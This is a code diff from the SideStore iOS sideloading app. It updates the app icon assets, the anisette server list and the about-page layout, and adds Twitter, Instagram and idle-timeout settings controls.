AppIcon.appiconset/","idiom":"ipad","scale":"1x"},{"size":"20x20","expected-size":"40","filename":"40.png","folder":"Assets.xcassets/AppIcon.appiconset/","idiom":"ipad","scale":"2x"}]}
+{
+  "images" : [
+    {
+      "filename" : "40.png",
+      "idiom" : "iphone",
+      "scale" : "2x",
+      "size" : "20x20"
+    },
+    {
+      "filename" : "60.png",
+      "idiom" : "iphone",
+      "scale" : "3x",
+      "size" : "20x20"
+    },
+    {
+      "filename" : "29.png",
+      "idiom" : "iphone",
+      "scale" : "1x",
+      "size" : "29x29"
+    },
+    {
+      "filename" : "58.png",
+      "idiom" : "iphone",
+      "scale" : "2x",
+      "size" : "29x29"
+    },
+    {
+      "filename" : "87.png",
+      "idiom" : "iphone",
+      "scale" : "3x",
+      "size" : "29x29"
+    },
+    {
+      "filename" : "80.png",
+      "idiom" : "iphone",
+      "scale" : "2x",
+      "size" : "40x40"
+    },
+    {
+      "filename" : "120.png",
+      "idiom" : "iphone",
+      "scale" : "3x",
+      "size" : "40x40"
+    },
+    {
+      "filename" : "57.png",
+      "idiom" : "iphone",
+      "scale" : "1x",
+      "size" : "57x57"
+    },
+    {
+      "filename" : "114.png",
+      "idiom" : "iphone",
+      "scale" : "2x",
+      "size" : "57x57"
+    },
+    {
+      "filename" : "120.png",
+      "idiom" : "iphone",
+      "scale" : "2x",
+      "size" : "60x60"
+    },
+    {
+      "filename" : "180.png",
+      "idiom" : "iphone",
+      "scale" : "3x",
+      "size" : "60x60"
+    },
+    {
+      "filename" : "20.png",
+      "idiom" : "ipad",
+      "scale" : "1x",
+      "size" : "20x20"
+    },
+    {
+      "filename" : "40.png",
+      "idiom" : "ipad",
+      "scale" : "2x",
+      "size" : "20x20"
+    },
+    {
+      "filename" : "29.png",
+      "idiom" : "ipad",
+      "scale" : "1x",
+      "size" : "29x29"
+    },
+    {
+      "filename" : "58.png",
+      "idiom" : "ipad",
+      "scale" : "2x",
+      "size" : "29x29"
+    },
+    {
+      "filename" : "40.png",
+      "idiom" : "ipad",
+      "scale" : "1x",
+      "size" : "40x40"
+    },
+    {
+      "filename" : "80.png",
+      "idiom" : "ipad",
+      "scale" : "2x",
+      "size" : "40x40"
+    },
+    {
+      "filename" : "50.png",
+      "idiom" : "ipad",
+      "scale" : "1x",
+      "size" : "50x50"
+    },
+    {
+      "filename" : "100.png",
+      "idiom" : "ipad",
+      "scale" : "2x",
+      "size" : "50x50"
+    },
+    {
+      "filename" : "72.png",
+      "idiom" : "ipad",
+      "scale" : "1x",
+      "size" : "72x72"
+    },
+    {
+      "filename" : "144.png",
+      "idiom" : "ipad",
+      "scale" : "2x",
+      "size" : "72x72"
+    },
+    {
+      "filename" : "76.png",
+      "idiom" : "ipad",
+      "scale" : "1x",
+      "size" : "76x76"
+    },
+    {
+      "filename" : "152.png",
+      "idiom" : "ipad",
+      "scale" : "2x",
+      "size" : "76x76"
+    },
+    {
+      "filename" : "167.png",
+      "idiom" : "ipad",
+      "scale" : "2x",
+      "size" : "83.5x83.5"
+    },
+    {
+      "filename" : "1024.png",
+      "idiom" : "ios-marketing",
+      "scale" : "1x",
+      "size" : "1024x1024"
+    }
+  ],
+  "info" : {
+    "author" : "xcode",
+    "version" : 1
+  }
+}

AltStore/Resources/Assets.xcassets/Riley.imageset/Contents.json

@@ -1,12 +0,0 @@
-{
-  "images" : [
-    {
-      "filename" : "riley.jpg",
-      "idiom" : "universal"
-    }
-  ],
-  "info" : {
-    "author" : "xcode",
-    "version" : 1
-  }
-}

AltStore/Resources/Assets.xcassets/Shane.imageset/Contents.json

@@ -1,12 +0,0 @@
-{
-  "images" : [
-    {
-      "filename" : "shane.jpeg",
-      "idiom" : "universal"
-    }
-  ],
-  "info" : {
-    "author" : "xcode",
-    "version" : 1
-  }
-}

AltStore/Resources/Assets.xcassets/SideStore.imageset/Contents.json

@@ -0,0 +1,21 @@
+{
+  "images" : [
+    {
+      "filename" : "1024.png",
+      "idiom" : "universal",
+      "scale" : "1x"
+    },
+    {
+      "idiom" : "universal",
+      "scale" : "2x"
+    },
+    {
+      "idiom" : "universal",
+      "scale" : "3x"
+    }
+  ],
+  "info" : {
+    "author" : "xcode",
+    "version" : 1
+  }
+}

AltStore/Settings.bundle/Root.plist

@@ -30,9 +30,9 @@
 			</array>
 			<key>Values</key>
 			<array>
-				<string>http://ani.sidestore.io:6969</string>
+				<string>https://ani.sidestore.io</string>
-				<string>http://us1.sternserv.tech</string>
+				<string>http://5.249.163.88:6969/</string>
-				<string>http://de1.sternserv.tech</string>
+				<string>http://45.132.246.138:6969/</string>
 				<string>https://sign.rheaa.xyz</string>
 				<string>https://sideloadly.io/anisette/irGb3Quww8zrhgqnzmrx</string>
 				<string>http://45.33.29.114</string>

AltStore/Settings/AboutPatreonHeaderView.xib

@@ -1,27 +1,27 @@
 <?xml version="1.0" encoding="UTF-8"?>
-<document type="com.apple.InterfaceBuilder3.CocoaTouch.XIB" version="3.0" toolsVersion="21225" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" useTraitCollections="YES" useSafeAreas="YES" colorMatched="YES">
+<document type="com.apple.InterfaceBuilder3.CocoaTouch.XIB" version="3.0" toolsVersion="21507" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" useTraitCollections="YES" useSafeAreas="YES" colorMatched="YES">
     <device id="retina6_1" orientation="portrait" appearance="light"/>
     <dependencies>
         <deployment identifier="iOS"/>
-        <plugIn identifier="com.apple.InterfaceBuilder.IBCocoaTouchPlugin" version="21207"/>
+        <plugIn identifier="com.apple.InterfaceBuilder.IBCocoaTouchPlugin" version="21505"/>
         <capability name="Named colors" minToolsVersion="9.0"/>
         <capability name="documents saved in the Xcode 8 format" minToolsVersion="8.0"/>
     </dependencies>
     <objects>
         <placeholder placeholderIdentifier="IBFilesOwner" id="-1" userLabel="File's Owner"/>
         <placeholder placeholderIdentifier="IBFirstResponder" id="-2" customClass="UIResponder"/>
-        <collectionReusableView opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" insetsLayoutMarginsFromSafeArea="NO" reuseIdentifier="AboutHeader" id="xq2-Pl-zaG" customClass="AboutPatreonHeaderView" customModule="AltStore" customModuleProvider="target">
+        <collectionReusableView opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" insetsLayoutMarginsFromSafeArea="NO" reuseIdentifier="AboutHeader" id="xq2-Pl-zaG" customClass="AboutPatreonHeaderView" customModule="SideStore" customModuleProvider="target">
-            <rect key="frame" x="0.0" y="0.0" width="375" height="445"/>
+            <rect key="frame" x="0.0" y="0.0" width="390" height="682"/>
             <autoresizingMask key="autoresizingMask"/>
             <subviews>
                 <stackView opaque="NO" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" axis="vertical" spacing="25" translatesAutoresizingMaskIntoConstraints="NO" id="XiA-Jf-XMp">
-                    <rect key="frame" x="16" y="2" width="343" height="393"/>
+                    <rect key="frame" x="16" y="2" width="358" height="630"/>
                     <subviews>
                         <stackView opaque="NO" contentMode="scaleToFill" axis="vertical" spacing="10" translatesAutoresizingMaskIntoConstraints="NO" id="5Ol-zN-wYv">
-                            <rect key="frame" x="0.0" y="0.0" width="343" height="317"/>
+                            <rect key="frame" x="0.0" y="0.0" width="358" height="426"/>
                             <subviews>
                                 <stackView opaque="NO" contentMode="scaleToFill" alignment="center" spacing="10" translatesAutoresizingMaskIntoConstraints="NO" id="f7H-EV-7Sx">
-                                    <rect key="frame" x="0.0" y="0.0" width="343" height="55"/>
+                                    <rect key="frame" x="0.0" y="0.0" width="358" height="55"/>
                                     <subviews>
                                         <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="SideStore" translatesAutoresizingMaskIntoConstraints="NO" id="pn6-Ic-MJm">
                                             <rect key="frame" x="0.0" y="0.0" width="55" height="55"/>
@@ -31,7 +31,7 @@
                                             </constraints>
                                         </imageView>
                                         <stackView opaque="NO" contentMode="scaleToFill" distribution="equalSpacing" spacing="10" translatesAutoresizingMaskIntoConstraints="NO" id="si2-MA-3RH">
-                                            <rect key="frame" x="65" y="0.0" width="278" height="55"/>
+                                            <rect key="frame" x="65" y="0.0" width="293" height="55"/>
                                             <subviews>
                                                 <stackView opaque="NO" contentMode="scaleToFill" axis="vertical" spacing="2" translatesAutoresizingMaskIntoConstraints="NO" id="hkS-oz-wiT">
                                                     <rect key="frame" x="0.0" y="0.0" width="83" height="55"/>
@@ -51,7 +51,7 @@
                                                     </subviews>
                                                 </stackView>
                                                 <stackView opaque="NO" contentMode="scaleToFill" axis="vertical" spacing="2" translatesAutoresizingMaskIntoConstraints="NO" id="TFB-qo-cbh">
-                                                    <rect key="frame" x="195" y="0.0" width="83" height="55"/>
+                                                    <rect key="frame" x="210" y="0.0" width="83" height="55"/>
                                                     <subviews>
                                                         <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="" textAlignment="right" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumScaleFactor="0.5" translatesAutoresizingMaskIntoConstraints="NO" id="Zpb-k3-y7l">
                                                             <rect key="frame" x="0.0" y="0.0" width="83" height="50"/>
@@ -75,11 +75,13 @@
                                     </constraints>
                                 </stackView>
                                 <textView clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="scaleToFill" scrollEnabled="NO" editable="NO" textAlignment="natural" selectable="NO" translatesAutoresizingMaskIntoConstraints="NO" id="FeG-e5-LJl">
-                                    <rect key="frame" x="0.0" y="65" width="343" height="252"/>
+                                    <rect key="frame" x="0.0" y="65" width="358" height="361"/>
                                     <color key="backgroundColor" white="1" alpha="0.13" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
-                                    <string key="text">Hello, thank you for using SideStore!
+                                    <string key="text">Thank you for using SideStore!
         
-If you would subscribe to the patreon that would support us and make sure we can continue developing SideStore for you.
+Subscribing to the patreon supports us and makes sure we can continue developing SideStore for you.
+    
+Following us on social media allows us to give quick updates and spread the word about sideloading!
         
 -SideTeam</string>
                                     <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
@@ -89,10 +91,10 @@ If you would subscribe to the patreon that would support us and make sure we can
                             </subviews>
                         </stackView>
                         <stackView opaque="NO" contentMode="scaleToFill" axis="vertical" spacing="13" translatesAutoresizingMaskIntoConstraints="NO" id="QS9-vO-bj8">
-                            <rect key="frame" x="0.0" y="342" width="343" height="51"/>
+                            <rect key="frame" x="0.0" y="451" width="358" height="179"/>
                             <subviews>
                                 <button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="center" contentVerticalAlignment="center" buttonType="system" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="yEi-L6-kQ8">
-                                    <rect key="frame" x="0.0" y="0.0" width="343" height="51"/>
+                                    <rect key="frame" x="0.0" y="0.0" width="358" height="51"/>
                                     <color key="backgroundColor" name="SettingsHighlighted"/>
                                     <constraints>
                                         <constraint firstAttribute="height" constant="51" id="l4o-vb-cMy"/>
@@ -102,6 +104,28 @@ If you would subscribe to the patreon that would support us and make sure we can
                                         <color key="titleColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                     </state>
                                 </button>
+                                <button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="center" contentVerticalAlignment="center" buttonType="system" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="hov-Ce-LaM" userLabel="Twitter Button">
+                                    <rect key="frame" x="0.0" y="64" width="358" height="51"/>
+                                    <color key="backgroundColor" name="SettingsHighlighted"/>
+                                    <constraints>
+                                        <constraint firstAttribute="height" constant="51" id="m0M-GX-KKG"/>
+                                    </constraints>
+                                    <fontDescription key="fontDescription" type="system" weight="semibold" pointSize="19"/>
+                                    <state key="normal" title="Follow us on Twitter!">
+                                        <color key="titleColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
+                                    </state>
+                                </button>
+                                <button opaque="NO" contentMode="scaleToFill" contentHorizontalAlignment="center" contentVerticalAlignment="center" buttonType="system" lineBreakMode="middleTruncation" translatesAutoresizingMaskIntoConstraints="NO" id="VdY-7Q-amF" userLabel="Twitter Button">
+                                    <rect key="frame" x="0.0" y="128" width="358" height="51"/>
+                                    <color key="backgroundColor" name="SettingsHighlighted"/>
+                                    <constraints>
+                                        <constraint firstAttribute="height" constant="51" id="kDo-b8-6tZ"/>
+                                    </constraints>
+                                    <fontDescription key="fontDescription" type="system" weight="semibold" pointSize="19"/>
+                                    <state key="normal" title="Follow us on Instagram!">
+                                        <color key="titleColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
+                                    </state>
+                                </button>
                             </subviews>
                         </stackView>
                     </subviews>
@@ -114,19 +138,21 @@ If you would subscribe to the patreon that would support us and make sure we can
                 <constraint firstItem="XiA-Jf-XMp" firstAttribute="top" secondItem="xq2-Pl-zaG" secondAttribute="top" constant="2" id="j8p-JX-Dcz"/>
             </constraints>
             <connections>
+                <outlet property="instagramButton" destination="VdY-7Q-amF" id="5kj-9x-k4F"/>
                 <outlet property="rileyImageView" destination="pn6-Ic-MJm" id="60i-Q0-ojz"/>
                 <outlet property="rileyLabel" destination="DTd-Yu-HXr" id="O0y-JB-gWp"/>
                 <outlet property="shaneLabel" destination="Zpb-k3-y7l" id="aQN-6B-s5T"/>
                 <outlet property="supportButton" destination="yEi-L6-kQ8" id="Dzo-vd-SnD"/>
                 <outlet property="textView" destination="FeG-e5-LJl" id="K0M-lF-I6u"/>
+                <outlet property="twitterButton" destination="hov-Ce-LaM" id="gib-Lt-qtY"/>
             </connections>
-            <point key="canvasLocation" x="138" y="138"/>
+            <point key="canvasLocation" x="147.82608695652175" y="58.258928571428569"/>
         </collectionReusableView>
     </objects>
     <resources>
-        <image name="SideStore" width="180" height="180"/>
+        <image name="SideStore" width="1024" height="1024"/>
         <namedColor name="SettingsHighlighted">
-            <color red="0.23529411764705882" green="0.0" blue="0.40392156862745099" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
+            <color red="0.38823529411764707" green="0.011764705882352941" blue="0.58823529411764708" alpha="1" colorSpace="custom" customColorSpace="sRGB"/>
         </namedColor>
     </resources>
 </document>

AltStore/Settings/PatreonComponents.swift

@@ -56,6 +56,8 @@ final class PatronsFooterView: UICollectionReusableView
 final class AboutPatreonHeaderView: UICollectionReusableView
 {
     @IBOutlet var supportButton: UIButton!
+    @IBOutlet var twitterButton: UIButton!
+    @IBOutlet var instagramButton: UIButton!
     @IBOutlet var accountButton: UIButton!
     @IBOutlet var textView: UITextView!
     
@@ -79,12 +81,12 @@ final class AboutPatreonHeaderView: UICollectionReusableView
             imageView.layer.cornerRadius = imageView.bounds.midY
         }
         
-        for button in [self.supportButton, self.accountButton].compactMap({ $0 })
+        for button in [self.supportButton, self.accountButton, self.twitterButton, self.instagramButton].compactMap({ $0 })
         {
             button.clipsToBounds = true
             button.layer.cornerRadius = 16
         }
-    }
+}
     
     override func layoutMarginsDidChange()
     {

AltStore/Settings/PatreonViewController.swift

@@ -111,7 +111,9 @@ private extension PatreonViewController
         headerView.layoutMargins = self.view.layoutMargins
         
         headerView.supportButton.addTarget(self, action: #selector(PatreonViewController.openPatreonURL(_:)), for: .primaryActionTriggered)
-        
+        headerView.twitterButton.addTarget(self, action: #selector(PatreonViewController.openTwitterURL(_:)), for: .primaryActionTriggered)
+        headerView.instagramButton.addTarget(self, action: #selector(PatreonViewController.openInstagramURL(_:)), for: .primaryActionTriggered)
+
         let defaultSupportButtonTitle = NSLocalizedString("Become a patron", comment: "")
         let isPatronSupportButtonTitle = NSLocalizedString("View Patreon", comment: "")
         
@@ -180,6 +182,24 @@ private extension PatreonViewController
         self.present(safariViewController, animated: true, completion: nil)
     }
     
+    @objc func openTwitterURL(_ sender: UIButton)
+    {
+        let twitterURL = URL(string: "https://twitter.com/SideStore_io")!
+        
+        let safariViewController = SFSafariViewController(url: twitterURL)
+        safariViewController.preferredControlTintColor = self.view.tintColor
+        self.present(safariViewController, animated: true, completion: nil)
+    }
+    
+    @objc func openInstagramURL(_ sender: UIButton)
+    {
+        let twitterURL = URL(string: "https://instagram.com/sidestore.io")!
+        
+        let safariViewController = SFSafariViewController(url: twitterURL)
+        safariViewController.preferredControlTintColor = self.view.tintColor
+        self.present(safariViewController, animated: true, completion: nil)
+    }
+    
     @IBAction func authenticate(_ sender: UIBarButtonItem)
     {
         PatreonAPI.shared.authenticate { (result) in

AltStore/Settings/Settings.storyboard

@@ -21,7 +21,7 @@
                         <color key="tintColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                         <color key="separatorColor" white="1" alpha="0.25" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                         <label key="tableFooterView" opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="SideStore 1.0" textAlignment="center" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" id="bUR-rp-Nw2">
-                            <rect key="frame" x="0.0" y="1194" width="375" height="25"/>
+                            <rect key="frame" x="0.0" y="1341" width="375" height="25"/>
                             <autoresizingMask key="autoresizingMask" flexibleMaxX="YES" flexibleMaxY="YES"/>
                             <fontDescription key="fontDescription" type="system" pointSize="17"/>
                             <color key="textColor" white="1" alpha="0.69999999999999996" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
@@ -167,8 +167,8 @@
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
-                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Join the beta" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="3Il-5a-5Zp">
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Support the team" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="3Il-5a-5Zp">
-                                                    <rect key="frame" x="30" y="15.5" width="106" height="20.5"/>
+                                                    <rect key="frame" x="30" y="15.5" width="142.5" height="20.5"/>
                                                     <fontDescription key="fontDescription" type="boldSystem" pointSize="17"/>
                                                     <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                     <nil key="highlightedColor"/>
@@ -236,9 +236,45 @@
                                             <userDefinedRuntimeAttribute type="boolean" keyPath="isSelectable" value="NO"/>
                                         </userDefinedRuntimeAttributes>
                                     </tableViewCell>
-                                    <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="amC-sE-8O0" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
+                                    <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="GYp-O0-pse" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
                                         <rect key="frame" x="0.0" y="444" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
+                                        <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="GYp-O0-pse" id="vDG-ZV-xRS">
+                                            <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
+                                            <autoresizingMask key="autoresizingMask"/>
+                                            <subviews>
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Disable Idle Timeout" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="PCh-Up-aJJ">
+                                                    <rect key="frame" x="30" y="15.5" width="166" height="20.5"/>
+                                                    <fontDescription key="fontDescription" type="boldSystem" pointSize="17"/>
+                                                    <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
+                                                    <nil key="highlightedColor"/>
+                                                </label>
+                                                <switch opaque="NO" contentMode="scaleToFill" horizontalHuggingPriority="750" verticalHuggingPriority="750" contentHorizontalAlignment="center" contentVerticalAlignment="center" on="YES" translatesAutoresizingMaskIntoConstraints="NO" id="iQA-wm-5ag">
+                                                    <rect key="frame" x="296" y="10" width="51" height="31"/>
+                                                    <connections>
+                                                        <action selector="toggleNoIdleTimeoutEnabled:" destination="aMk-Xp-UL8" eventType="valueChanged" id="WSl-Jc-g5J"/>
+                                                    </connections>
+                                                </switch>
+                                            </subviews>
+                                            <constraints>
+                                                <constraint firstAttribute="trailingMargin" secondItem="iQA-wm-5ag" secondAttribute="trailing" id="MJ1-HF-Dln"/>
+                                                <constraint firstItem="PCh-Up-aJJ" firstAttribute="leading" secondItem="vDG-ZV-xRS" secondAttribute="leadingMargin" id="Ocu-jn-RAQ"/>
+                                                <constraint firstItem="iQA-wm-5ag" firstAttribute="centerY" secondItem="vDG-ZV-xRS" secondAttribute="centerY" id="c6W-bN-VAb"/>
+                                                <constraint firstItem="PCh-Up-aJJ" firstAttribute="centerY" secondItem="vDG-ZV-xRS" secondAttribute="centerY" id="mL6-LB-cjn"/>
+                                            </constraints>
+                                        </tableViewCellContentView>
+                                        <color key="backgroundColor" white="1" alpha="0.14999999999999999" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
+                                        <edgeInsets key="layoutMargins" top="8" left="30" bottom="8" right="30"/>
+                                        <userDefinedRuntimeAttributes>
+                                            <userDefinedRuntimeAttribute type="number" keyPath="style">
+                                                <integer key="value" value="2"/>
+                                            </userDefinedRuntimeAttribute>
+                                            <userDefinedRuntimeAttribute type="boolean" keyPath="isSelectable" value="YES"/>
+                                        </userDefinedRuntimeAttributes>
+                                    </tableViewCell>
+                                    <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="amC-sE-8O0" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
+                                        <rect key="frame" x="0.0" y="495" width="375" height="51"/>
+                                        <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="amC-sE-8O0" id="GEO-2e-E4k">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
                                             <autoresizingMask key="autoresizingMask"/>
@@ -269,7 +305,7 @@
                             <tableViewSection headerTitle="" id="eHy-qI-w5w">
                                 <cells>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="30h-59-88f" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="535" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="586" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="30h-59-88f" id="7qD-DW-Jls">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
@@ -309,28 +345,28 @@
                             <tableViewSection headerTitle="" id="J90-vn-u2O">
                                 <cells>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="i4T-2q-jF3" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="626" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="677" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="i4T-2q-jF3" id="VTQ-H4-aCM">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
                                             <autoresizingMask key="autoresizingMask"/>
                                             <subviews>
-                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Developers" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="hRA-OK-Vjw">
+                                                <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="Developers" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="hRA-OK-Vjw">
                                                     <rect key="frame" x="30" y="15.5" width="86" height="20.5"/>
                                                     <fontDescription key="fontDescription" type="system" pointSize="17"/>
                                                     <color key="textColor" white="1" alpha="0.80000000000000004" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                     <nil key="highlightedColor"/>
                                                 </label>
-                                                <stackView opaque="NO" contentMode="scaleToFill" spacing="14" translatesAutoresizingMaskIntoConstraints="NO" id="lx9-35-OSk">
+                                                <stackView opaque="NO" contentMode="scaleToFill" ambiguous="YES" spacing="14" translatesAutoresizingMaskIntoConstraints="NO" id="lx9-35-OSk">
                                                     <rect key="frame" x="187.5" y="15.5" width="157.5" height="20.5"/>
                                                     <subviews>
-                                                        <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="SideStore Team" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="JAA-iZ-VGb">
+                                                        <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" text="SideStore Team" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="JAA-iZ-VGb">
                                                             <rect key="frame" x="0.0" y="0.0" width="125.5" height="20.5"/>
                                                             <fontDescription key="fontDescription" type="system" weight="semibold" pointSize="17"/>
                                                             <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                             <nil key="highlightedColor"/>
                                                         </label>
-                                                        <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="Mmj-3V-fTb">
+                                                        <imageView clipsSubviews="YES" userInteractionEnabled="NO" contentMode="scaleAspectFit" horizontalHuggingPriority="251" verticalHuggingPriority="251" ambiguous="YES" image="Next" translatesAutoresizingMaskIntoConstraints="NO" id="Mmj-3V-fTb">
                                                             <rect key="frame" x="139.5" y="0.0" width="18" height="20.5"/>
                                                         </imageView>
                                                     </subviews>
@@ -353,7 +389,7 @@
                                         </userDefinedRuntimeAttributes>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="oHX-oR-nwJ" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="677" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="728" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="oHX-oR-nwJ" id="hN4-i5-igu">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
@@ -397,7 +433,7 @@
                                         </userDefinedRuntimeAttributes>
                                     </tableViewCell>
                                     <tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" rowHeight="51" id="0MT-ht-Sit" customClass="InsetGroupTableViewCell" customModule="SideStore" customModuleProvider="target">
-                                        <rect key="frame" x="0.0" y="728" width="375" height="51"/>
+                                        <rect key="frame" x="0.0" y="779" width="375" height="51"/>
                                         <autoresizingMask key="autoresizingMask"/>
                                         <tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" insetsLayoutMarginsFromSafeArea="NO" tableViewCell="0MT-ht-Sit" id="OZp-WM-5H7">
                                             <rect key="frame" x="0.0" y="0.0" width="375" height="51"/>
@@ -441,7 +477,7 @@
                                         </userDefinedRuntimeAttributes>
                                     </tableViewCell>
